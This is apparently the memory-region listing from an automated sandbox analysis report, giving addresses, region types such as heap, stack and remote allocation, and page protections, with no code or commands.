E5F000
|
stack
|
page read and write
|
||
|
2EDA000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF887090000
|
trusted library allocation
|
page read and write
|
||
|
171D03A1000
|
heap
|
page read and write
|
||
|
A335000
|
heap
|
page read and write
|
||
|
7A00000
|
trusted library allocation
|
page read and write
|
||
|
18939C11000
|
heap
|
page read and write
|
||
|
4EAE000
|
stack
|
page read and write
|
||
|
7FF886EF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3470000
|
heap
|
page read and write
|
||
|
7FF886F50000
|
trusted library allocation
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
A1A0000
|
direct allocation
|
page read and write
|
||
|
171D058A000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
18939930000
|
heap
|
page read and write
|
||
|
171CE530000
|
remote allocation
|
page read and write
|
||
|
E00000
|
trusted library allocation
|
page read and write
|
||
|
171D09C9000
|
heap
|
page read and write
|
||
|
171D0263000
|
heap
|
page read and write
|
||
|
27F2D000
|
heap
|
page read and write
|
||
|
171D01B1000
|
heap
|
page read and write
|
||
|
33CA000
|
trusted library allocation
|
page execute and read and write
|
||
|
171D04BF000
|
heap
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
E14000
|
trusted library allocation
|
page read and write
|
||
|
171D0228000
|
heap
|
page read and write
|
||
|
27DAC000
|
stack
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
33B9000
|
trusted library allocation
|
page read and write
|
||
|
5F79000
|
trusted library allocation
|
page read and write
|
||
|
28A00000
|
trusted library allocation
|
page read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
27C60000
|
heap
|
page execute and read and write
|
||
|
171D0430000
|
heap
|
page read and write
|
||
|
171D01F6000
|
heap
|
page read and write
|
||
|
171D0216000
|
heap
|
page read and write
|
||
|
25BD0000
|
heap
|
page read and write
|
||
|
171D0192000
|
heap
|
page read and write
|
||
|
171D0257000
|
heap
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
289BD000
|
trusted library allocation
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
88BC000
|
stack
|
page read and write
|
||
|
171D0238000
|
heap
|
page read and write
|
||
|
8BCE000
|
stack
|
page read and write
|
||
|
18921A79000
|
trusted library allocation
|
page read and write
|
||
|
171D039A000
|
heap
|
page read and write
|
||
|
171D02EF000
|
heap
|
page read and write
|
||
|
A230000
|
direct allocation
|
page read and write
|
||
|
171D01BE000
|
heap
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
171D02C1000
|
heap
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
171D035B000
|
heap
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page execute and read and write
|
||
|
171D0381000
|
heap
|
page read and write
|
||
|
27EE6000
|
heap
|
page read and write
|
||
|
18923399000
|
trusted library allocation
|
page read and write
|
||
|
171D0980000
|
heap
|
page read and write
|
||
|
259B0000
|
heap
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
870E000
|
stack
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
289D0000
|
trusted library allocation
|
page read and write
|
||
|
61BC000
|
trusted library allocation
|
page read and write
|
||
|
6404DFE000
|
stack
|
page read and write
|
||
|
2EE2000
|
trusted library allocation
|
page read and write
|
||
|
18921AA3000
|
trusted library allocation
|
page read and write
|
||
|
A2E7000
|
heap
|
page read and write
|
||
|
171D01D1000
|
heap
|
page read and write
|
||
|
171D09A9000
|
heap
|
page read and write
|
||
|
171D0372000
|
heap
|
page read and write
|
||
|
9605000
|
remote allocation
|
page execute and read and write
|
||
|
171D02D3000
|
heap
|
page read and write
|
||
|
171D01CE000
|
heap
|
page read and write
|
||
|
2DAF000
|
unkown
|
page read and write
|
||
|
171D02F2000
|
heap
|
page read and write
|
||
|
171D02C6000
|
heap
|
page read and write
|
||
|
171D02ED000
|
heap
|
page read and write
|
||
|
258B0000
|
remote allocation
|
page read and write
|
||
|
7FF886EE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
289B3000
|
trusted library allocation
|
page read and write
|
||
|
ACC000
|
heap
|
page read and write
|
||
|
18923563000
|
trusted library allocation
|
page read and write
|
||
|
27DB0000
|
heap
|
page read and write
|
||
|
171D027E000
|
heap
|
page read and write
|
||
|
88FB000
|
stack
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
28AE0000
|
trusted library allocation
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
6405000
|
remote allocation
|
page execute and read and write
|
||
|
25710000
|
trusted library allocation
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
171D0372000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FC0000
|
trusted library allocation
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
1891FA30000
|
trusted library allocation
|
page read and write
|
||
|
18921E1C000
|
trusted library allocation
|
page read and write
|
||
|
2EF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
18939A30000
|
heap
|
page read and write
|
||
|
5F21000
|
trusted library allocation
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
8C60000
|
direct allocation
|
page read and write
|
||
|
79A8000
|
trusted library allocation
|
page read and write
|
||
|
27F32000
|
heap
|
page read and write
|
||
|
7B5D000
|
stack
|
page read and write
|
||
|
BD85000
|
direct allocation
|
page execute and read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
171CE2E8000
|
heap
|
page read and write
|
||
|
171D02E8000
|
heap
|
page read and write
|
||
|
1BAA3420000
|
heap
|
page read and write
|
||
|
171D0433000
|
heap
|
page read and write
|
||
|
289A3000
|
trusted library allocation
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
1891F96F000
|
heap
|
page read and write
|
||
|
25C1F000
|
trusted library allocation
|
page read and write
|
||
|
171D019A000
|
heap
|
page read and write
|
||
|
18921A8E000
|
trusted library allocation
|
page read and write
|
||
|
27F1B000
|
heap
|
page read and write
|
||
|
171CE270000
|
heap
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
DA8000
|
heap
|
page read and write
|
||
|
28B00000
|
trusted library allocation
|
page read and write
|
||
|
2FF0000
|
trusted library section
|
page read and write
|
||
|
78B2000
|
heap
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
3478000
|
heap
|
page read and write
|
||
|
6E05000
|
remote allocation
|
page execute and read and write
|
||
|
7FF887060000
|
trusted library allocation
|
page read and write
|
||
|
171D01A6000
|
heap
|
page read and write
|
||
|
171D0243000
|
heap
|
page read and write
|
||
|
18939A50000
|
heap
|
page read and write
|
||
|
289E8000
|
trusted library allocation
|
page read and write
|
||
|
4F73000
|
trusted library allocation
|
page read and write
|
||
|
32FF000
|
heap
|
page read and write
|
||
|
171D040C000
|
heap
|
page read and write
|
||
|
774E000
|
stack
|
page read and write
|
||
|
7370000
|
direct allocation
|
page read and write
|
||
|
2895E000
|
stack
|
page read and write
|
||
|
171CE3AB000
|
heap
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
18939A55000
|
heap
|
page read and write
|
||
|
171CE2E9000
|
heap
|
page read and write
|
||
|
171D027E000
|
heap
|
page read and write
|
||
|
28B9E000
|
stack
|
page read and write
|
||
|
289D0000
|
trusted library allocation
|
page read and write
|
||
|
A2B4000
|
heap
|
page read and write
|
||
|
171D03E7000
|
heap
|
page read and write
|
||
|
171D01DA000
|
heap
|
page read and write
|
||
|
7FF886D23000
|
trusted library allocation
|
page execute and read and write
|
||
|
171D09A2000
|
heap
|
page read and write
|
||
|
4D70000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
171D0433000
|
heap
|
page read and write
|
||
|
A180000
|
heap
|
page readonly
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
77E1000
|
heap
|
page read and write
|
||
|
8C70000
|
direct allocation
|
page read and write
|
||
|
1891F945000
|
heap
|
page read and write
|
||
|
171D0434000
|
heap
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
171D02F7000
|
heap
|
page read and write
|
||
|
171D0206000
|
heap
|
page read and write
|
||
|
1891F995000
|
heap
|
page read and write
|
||
|
27EB4000
|
heap
|
page read and write
|
||
|
2829D000
|
stack
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
171D024B000
|
heap
|
page read and write
|
||
|
A250000
|
direct allocation
|
page read and write
|
||
|
7805000
|
remote allocation
|
page execute and read and write
|
||
|
171D01B6000
|
heap
|
page read and write
|
||
|
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
|
171D0310000
|
heap
|
page read and write
|
||
|
171D0372000
|
heap
|
page read and write
|
||
|
171D09C9000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
171D021C000
|
heap
|
page read and write
|
||
|
4F00000
|
heap
|
page execute and read and write
|
||
|
27C12000
|
trusted library allocation
|
page read and write
|
||
|
18939C28000
|
heap
|
page read and write
|
||
|
171D0280000
|
heap
|
page read and write
|
||
|
171D0385000
|
heap
|
page read and write
|
||
|
171D0180000
|
heap
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
171D034F000
|
heap
|
page read and write
|
||
|
26C09000
|
trusted library allocation
|
page read and write
|
||
|
2EC0000
|
trusted library allocation
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
87A5000
|
trusted library allocation
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
28A30000
|
trusted library allocation
|
page read and write
|
||
|
171D09C9000
|
heap
|
page read and write
|
||
|
171D0391000
|
heap
|
page read and write
|
||
|
171D0359000
|
heap
|
page read and write
|
||
|
7794000
|
heap
|
page read and write
|
||
|
18921AE5000
|
trusted library allocation
|
page read and write
|
||
|
289A3000
|
trusted library allocation
|
page read and write
|
||
|
33A0000
|
trusted library allocation
|
page read and write
|
||
|
A1D7000
|
heap
|
page read and write
|
||
|
171D02C1000
|
heap
|
page read and write
|
||
|
65E548D000
|
stack
|
page read and write
|
||
|
4F11000
|
trusted library allocation
|
page read and write
|
||
|
8C0C000
|
stack
|
page read and write
|
||
|
2561D000
|
stack
|
page read and write
|
||
|
171D09C6000
|
heap
|
page read and write
|
||
|
7FF886F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
4E2E000
|
stack
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
289D0000
|
trusted library allocation
|
page read and write
|
||
|
18923446000
|
trusted library allocation
|
page read and write
|
||
|
4DE5000
|
heap
|
page execute and read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF887000000
|
trusted library allocation
|
page read and write
|
||
|
3380000
|
trusted library section
|
page read and write
|
||
|
E1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
A2E4000
|
heap
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
1892339D000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F40000
|
trusted library allocation
|
page read and write
|
||
|
2835E000
|
stack
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
7A30000
|
trusted library allocation
|
page read and write
|
||
|
A1D0000
|
heap
|
page read and write
|
||
|
3316000
|
heap
|
page read and write
|
||
|
65E44FE000
|
stack
|
page read and write
|
||
|
289B1000
|
trusted library allocation
|
page read and write
|
||
|
171D034F000
|
heap
|
page read and write
|
||
|
27C50000
|
trusted library allocation
|
page read and write
|
||
|
171D0220000
|
heap
|
page read and write
|
||
|
6404BFD000
|
stack
|
page read and write
|
||
|
171D0994000
|
heap
|
page read and write
|
||
|
7FF886F90000
|
trusted library allocation
|
page read and write
|
||
|
18939986000
|
heap
|
page read and write
|
||
|
171D01FE000
|
heap
|
page read and write
|
||
|
DA0000
|
heap
|
page read and write
|
||
|
8660000
|
trusted library allocation
|
page read and write
|
||
|
18921390000
|
heap
|
page execute and read and write
|
||
|
8650000
|
trusted library allocation
|
page read and write
|
||
|
8720000
|
trusted library allocation
|
page execute and read and write
|
||
|
189233B4000
|
trusted library allocation
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
4DBF000
|
stack
|
page read and write
|
||
|
171D09C9000
|
heap
|
page read and write
|
||
|
171D0431000
|
heap
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
2579F000
|
stack
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
65E4636000
|
stack
|
page read and write
|
||
|
A2E7000
|
heap
|
page read and write
|
||
|
2599A000
|
stack
|
page read and write
|
||
|
171D027E000
|
heap
|
page read and write
|
||
|
18931611000
|
trusted library allocation
|
page read and write
|
||
|
1BAA343D000
|
heap
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
A1B0000
|
direct allocation
|
page read and write
|
||
|
189315F1000
|
trusted library allocation
|
page read and write
|
||
|
2EEB000
|
trusted library allocation
|
page execute and read and write
|
||
|
A278000
|
heap
|
page read and write
|
||
|
28A00000
|
trusted library allocation
|
page read and write
|
||
|
4D0E000
|
stack
|
page read and write
|
||
|
3390000
|
trusted library allocation
|
page read and write
|
||
|
8205000
|
remote allocation
|
page execute and read and write
|
||
|
171CE2C0000
|
heap
|
page read and write
|
||
|
34BE000
|
stack
|
page read and write
|
||
|
65E483E000
|
stack
|
page read and write
|
There are 920 hidden memdumps, click here to show them.